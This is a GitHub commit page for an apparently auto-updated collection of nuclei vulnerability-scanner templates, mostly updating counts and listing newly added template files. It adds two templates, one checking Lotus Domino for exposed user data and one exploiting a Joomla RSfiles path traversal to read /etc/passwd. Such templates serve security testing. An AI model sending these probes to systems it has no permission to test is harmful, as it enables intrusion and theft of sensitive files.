Skip to content

Commit

Permalink
Auto Updated
Browse files Browse the repository at this point in the history
  • Loading branch information
test committed Nov 20, 2024
1 parent c373a94 commit b4a25bd
Show file tree
Hide file tree
Showing 4,386 changed files with 704,858 additions and 86,150 deletions.
The diff you're trying to view is too large. We only load the first 3000 changed files.
176 changes: 85 additions & 91 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -20,100 +20,94 @@
| CVE-2016 | 254 |
| CVE-2017 | 406 |
| CVE-2018 | 453 |
| CVE-2019 | 526 |
| CVE-2020 | 609 |
| CVE-2019 | 525 |
| CVE-2020 | 610 |
| CVE-2021 | 1747 |
| CVE-2022 | 2482 |
| CVE-2023 | 4810 |
| CVE-2024 | 6721 |
| Other | 26610 |
| CVE-2022 | 2483 |
| CVE-2023 | 4809 |
| CVE-2024 | 6737 |
| Other | 26607 |
## 近几天数量变化情况
|2024-11-13 | 2024-11-14 | 2024-11-15 | 2024-11-16 | 2024-11-17 | 2024-11-18 | 2024-11-19|
|2024-11-14 | 2024-11-15 | 2024-11-16 | 2024-11-17 | 2024-11-18 | 2024-11-19 | 2024-11-20|
|--- | ------ | ------ | ------ | ------ | ------ | ---|
|44923 | 45017 | 45136 | 46325 | 46327 | 46326 | 46344|
|45017 | 45136 | 46325 | 46327 | 46326 | 46344 | 46357|
## 最近新增文件
| templates name |
| --- |
| CVE-2024-51483.yaml |
| CVE-2024-8673.yaml |
| CVE-2022-48166.yaml |
| CVE-2022-44356.yaml |
| CVE-2022-48164.yaml |
| alfresco-panel.yaml |
| flexmls-detect.yaml |
| sap-web-dispatcher-admin-portal-10073.yaml |
| 2889691084.yaml |
| 685878723.yaml |
| 3548798736.yaml |
| alternc-panel.yaml |
| akuiteo-panel.yaml |
| 573268496.yaml |
| 2628791080.yaml |
| 3140309955.yaml |
| 1486043033.yaml |
| 4243212760.yaml |
| 173527743.yaml |
| zte-panel-11838.yaml |
| 1192756401.yaml |
| 2265594678.yaml |
| 2757251844.yaml |
| 473762364.yaml |
| 894225806.yaml |
| 3696601540.yaml |
| 2523211837.yaml |
| 2193906630.yaml |
| alamos-panel.yaml |
| 990349172.yaml |
| 3753806728.yaml |
| 1400097940.yaml |
| 3345020662.yaml |
| 1163650083.yaml |
| 60753597.yaml |
| 3510444022.yaml |
| thruk-panel.yaml |
| 1755170981.yaml |
| 471799455.yaml |
| 2533318898.yaml |
| 850295246.yaml |
| 2723016985.yaml |
| 3729878457.yaml |
| fortinet-fgfm-detect.yaml |
| zms-auth-bypass-11829.yaml |
| 4025836132.yaml |
| 4072408271.yaml |
| 3931284557.yaml |
| 1503454597.yaml |
| 2227667957.yaml |
| 2300926386.yaml |
| 1408482974.yaml |
| 594922867.yaml |
| 2596613775.yaml |
| 3692505568.yaml |
| 2703944587.yaml |
| 607989381.yaml |
| 1814708429.yaml |
| 1021548475.yaml |
| 389500117.yaml |
| setpreferences-xss(1).yaml |
| 2959770951.yaml |
| 2707902405.yaml |
| etcpasswd.yaml |
| 3699455206.yaml |
| changedetection.yaml |
| 1080568163.yaml |
| 2179057332.yaml |
| amazon-ecs-defualt-page.yaml |
| 4137527400.yaml |
| 2983633623.yaml |
| 4037176294.yaml |
| 1530733397.yaml |
| 633451849.yaml |
| 2576268398.yaml |
| 2726089592.yaml |
| 144853405.yaml |
| 1980961746.yaml |
| 781292612.yaml |
| anmelden-panel.yaml |
| 3133189941.yaml |
| wl-wn533a8_firmware.yaml |
| 2952330042.yaml |
| CVE-2024-10390.yaml |
| CVE-2024-10268.yaml |
| CVE-2024-11038.yaml |
| CVE-2024-11069.yaml |
| CVE-2024-11194.yaml |
| CVE-2024-9777.yaml |
| CVE-2024-11098.yaml |
| CVE-2024-10388.yaml |
| CVE-2024-9830.yaml |
| CVE-2024-11224.yaml |
| CVE-2024-11036.yaml |
| CVE-2024-11198.yaml |
| CVE-2024-11195.yaml |
| CVE-2024-10486.yaml |
| 2604822861.yaml |
| 9613321.yaml |
| bookstack-detect-764.yaml |
| 1014176159.yaml |
| 3525784120.yaml |
| 1200191409.yaml |
| 1763074754.yaml |
| 2770804765.yaml |
| 4247767131.yaml |
| 3716330286.yaml |
| 3499183601.yaml |
| 1574535231.yaml |
| 1046994046.yaml |
| 3777704211.yaml |
| 3811557993.yaml |
| 3224702519.yaml |
| 3090881125.yaml |
| 2257434466.yaml |
| 387265915.yaml |
| 2561678402.yaml |
| 1727118266.yaml |
| 1574414783.yaml |
| 2423614041.yaml |
| 1049614291.yaml |
| 1777747741.yaml |
| 1783847465.yaml |
| 116146157.yaml |
| 1858552467.yaml |
| 4067984997.yaml |
| 2826609747.yaml |
| 834347683.yaml |
| 2814510094.yaml |
| 3691145095.yaml |
| 3935867657.yaml |
| 4204722075.yaml |
| 2262855421.yaml |
| 1374740076.yaml |
| 1418728238.yaml |
| 4103467147.yaml |
| 3343906575.yaml |
| 1775067121.yaml |
| xss-headless.yaml |
| 3530503205.yaml |
| 4171721996.yaml |
| 3614402370.yaml |
| 1665372872.yaml |
| 2378325249.yaml |
| 1891948265.yaml |
| 93174518.yaml |
| 1826353917.yaml |
| 1197002657.yaml |
| 2598929970.yaml |
| wpb-popup-for-contact-form-7.yaml |
| elfsight-telegram-chat-cc.yaml |
| 2893268144.yaml |
| 3901038168.yaml |
| 2763879923.yaml |
| 3864206087.yaml |
| 3293461041.yaml |
| 1562174632.yaml |
| 418548613.yaml |
| 2188834782.yaml |
| cve-2021-26722.yaml |
3 changes: 2 additions & 1 deletion data.json
Original file line number Diff line number Diff line change
Expand Up @@ -255,5 +255,6 @@
"2024-11-16": 46325,
"2024-11-17": 46327,
"2024-11-18": 46326,
"2024-11-19": 46344
"2024-11-19": 46344,
"2024-11-20": 46357
}
79 changes: 78 additions & 1 deletion data1.json
Original file line number Diff line number Diff line change
Expand Up @@ -55015,5 +55015,82 @@
"anmelden-panel.yaml": "2024-11-19 02:34:38",
"3133189941.yaml": "2024-11-19 02:34:38",
"wl-wn533a8_firmware.yaml": "2024-11-19 02:34:38",
"2952330042.yaml": "2024-11-19 02:34:38"
"2952330042.yaml": "2024-11-19 02:34:38",
"CVE-2024-10390.yaml": "2024-11-20 02:33:16",
"CVE-2024-10268.yaml": "2024-11-20 02:33:16",
"CVE-2024-11038.yaml": "2024-11-20 02:33:16",
"CVE-2024-11069.yaml": "2024-11-20 02:33:16",
"CVE-2024-11194.yaml": "2024-11-20 02:33:16",
"CVE-2024-9777.yaml": "2024-11-20 02:33:16",
"CVE-2024-11098.yaml": "2024-11-20 02:33:16",
"CVE-2024-10388.yaml": "2024-11-20 02:33:16",
"CVE-2024-9830.yaml": "2024-11-20 02:33:16",
"CVE-2024-11224.yaml": "2024-11-20 02:33:16",
"CVE-2024-11036.yaml": "2024-11-20 02:33:16",
"CVE-2024-11198.yaml": "2024-11-20 02:33:16",
"CVE-2024-11195.yaml": "2024-11-20 02:33:16",
"CVE-2024-10486.yaml": "2024-11-20 02:33:16",
"2604822861.yaml": "2024-11-20 02:33:16",
"9613321.yaml": "2024-11-20 02:33:16",
"bookstack-detect-764.yaml": "2024-11-20 02:33:16",
"1014176159.yaml": "2024-11-20 02:33:16",
"3525784120.yaml": "2024-11-20 02:33:16",
"1200191409.yaml": "2024-11-20 02:33:16",
"1763074754.yaml": "2024-11-20 02:33:16",
"2770804765.yaml": "2024-11-20 02:33:16",
"4247767131.yaml": "2024-11-20 02:33:16",
"3716330286.yaml": "2024-11-20 02:33:16",
"3499183601.yaml": "2024-11-20 02:33:16",
"1574535231.yaml": "2024-11-20 02:33:16",
"1046994046.yaml": "2024-11-20 02:33:16",
"3777704211.yaml": "2024-11-20 02:33:16",
"3811557993.yaml": "2024-11-20 02:33:16",
"3224702519.yaml": "2024-11-20 02:33:16",
"3090881125.yaml": "2024-11-20 02:33:16",
"2257434466.yaml": "2024-11-20 02:33:16",
"387265915.yaml": "2024-11-20 02:33:16",
"2561678402.yaml": "2024-11-20 02:33:16",
"1727118266.yaml": "2024-11-20 02:33:16",
"1574414783.yaml": "2024-11-20 02:33:16",
"2423614041.yaml": "2024-11-20 02:33:16",
"1049614291.yaml": "2024-11-20 02:33:16",
"1777747741.yaml": "2024-11-20 02:33:16",
"1783847465.yaml": "2024-11-20 02:33:16",
"116146157.yaml": "2024-11-20 02:33:16",
"1858552467.yaml": "2024-11-20 02:33:16",
"4067984997.yaml": "2024-11-20 02:33:16",
"2826609747.yaml": "2024-11-20 02:33:16",
"834347683.yaml": "2024-11-20 02:33:16",
"2814510094.yaml": "2024-11-20 02:33:16",
"3691145095.yaml": "2024-11-20 02:33:16",
"3935867657.yaml": "2024-11-20 02:33:16",
"4204722075.yaml": "2024-11-20 02:33:16",
"2262855421.yaml": "2024-11-20 02:33:16",
"1374740076.yaml": "2024-11-20 02:33:16",
"1418728238.yaml": "2024-11-20 02:33:16",
"4103467147.yaml": "2024-11-20 02:33:16",
"3343906575.yaml": "2024-11-20 02:33:16",
"1775067121.yaml": "2024-11-20 02:33:16",
"xss-headless.yaml": "2024-11-20 02:33:16",
"3530503205.yaml": "2024-11-20 02:33:16",
"4171721996.yaml": "2024-11-20 02:33:16",
"3614402370.yaml": "2024-11-20 02:33:16",
"1665372872.yaml": "2024-11-20 02:33:16",
"2378325249.yaml": "2024-11-20 02:33:16",
"1891948265.yaml": "2024-11-20 02:33:16",
"93174518.yaml": "2024-11-20 02:33:16",
"1826353917.yaml": "2024-11-20 02:33:16",
"1197002657.yaml": "2024-11-20 02:33:16",
"2598929970.yaml": "2024-11-20 02:33:16",
"wpb-popup-for-contact-form-7.yaml": "2024-11-20 02:33:16",
"elfsight-telegram-chat-cc.yaml": "2024-11-20 02:33:16",
"2893268144.yaml": "2024-11-20 02:33:16",
"3901038168.yaml": "2024-11-20 02:33:16",
"2763879923.yaml": "2024-11-20 02:33:16",
"3864206087.yaml": "2024-11-20 02:33:16",
"3293461041.yaml": "2024-11-20 02:33:16",
"1562174632.yaml": "2024-11-20 02:33:16",
"418548613.yaml": "2024-11-20 02:33:16",
"2188834782.yaml": "2024-11-20 02:33:16",
"cve-2021-26722.yaml": "2024-11-20 02:33:16"
}
33 changes: 33 additions & 0 deletions nuclei-templates/CVE-2005/CVE-2005-2428.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,33 @@
id: CVE-2005-2428
info:
name: Lotus Domino R5 and R6 WebMail Default Configuration Information Disclosure
author: CasperGN
severity: medium
tags: cve,cve2005,domino
description: Lotus Domino R5 and R6 WebMail with 'Generate HTML for all fields' enabled allows remote attackers to read the HTML source to obtain sensitive information including the password hash in the HTTPPassword field, the password change date in the HTTPPasswordChangeDate field, and the client Lotus Domino release in the ClntBld field (a different vulnerability than CVE-2005-2696).
remediation: Ensure proper firewalls are in place within your environment to prevent public exposure of the names.nsf database and other sensitive files.
reference:
- http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf
- https://www.exploit-db.com/exploits/39495
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2005-2428
cwe-id: CWE-200

requests:
- method: GET
path:
- "{{BaseURL}}/names.nsf/People?OpenView"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
name: domino-username
regex:
- '(<a href="/names\.nsf/[0-9a-z\/]+\?OpenDocument)'
part: body

# Enhanced by mp on 2022/02/02
25 changes: 0 additions & 25 deletions nuclei-templates/CVE-2005/cve-2005-2428.yaml

This file was deleted.

30 changes: 30 additions & 0 deletions nuclei-templates/CVE-2007/CVE-2007-4504.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,30 @@
id: CVE-2007-4504

info:
name: Joomla! Component RSfiles <=1.0.2 - Arbitrary File Retrieval
author: daffainfo
severity: high
description: An arbitrary file retrieval vulnerability in index.php in the RSfiles component (com_rsfiles) <=1.0.2 for Joomla! allows remote attackers to arbitrarily read files via a .. (dot dot) in the path parameter in a files.display action.
reference:
- https://www.exploit-db.com/exploits/4307
- https://www.cvedetails.com/cve/CVE-2007-4504
- https://exchange.xforce.ibmcloud.com/vulnerabilities/36222
classification:
cve-id: CVE-2007-4504
tags: cve,cve2007,joomla,lfi

requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd"

matchers-condition: and
matchers:

- type: regex
regex:
- "root:.*:0:0:"

- type: status
status:
- 200
27 changes: 0 additions & 27 deletions nuclei-templates/CVE-2007/cve-2007-4504.yaml

This file was deleted.

Loading

0 comments on commit b4a25bd

Please sign in to comment.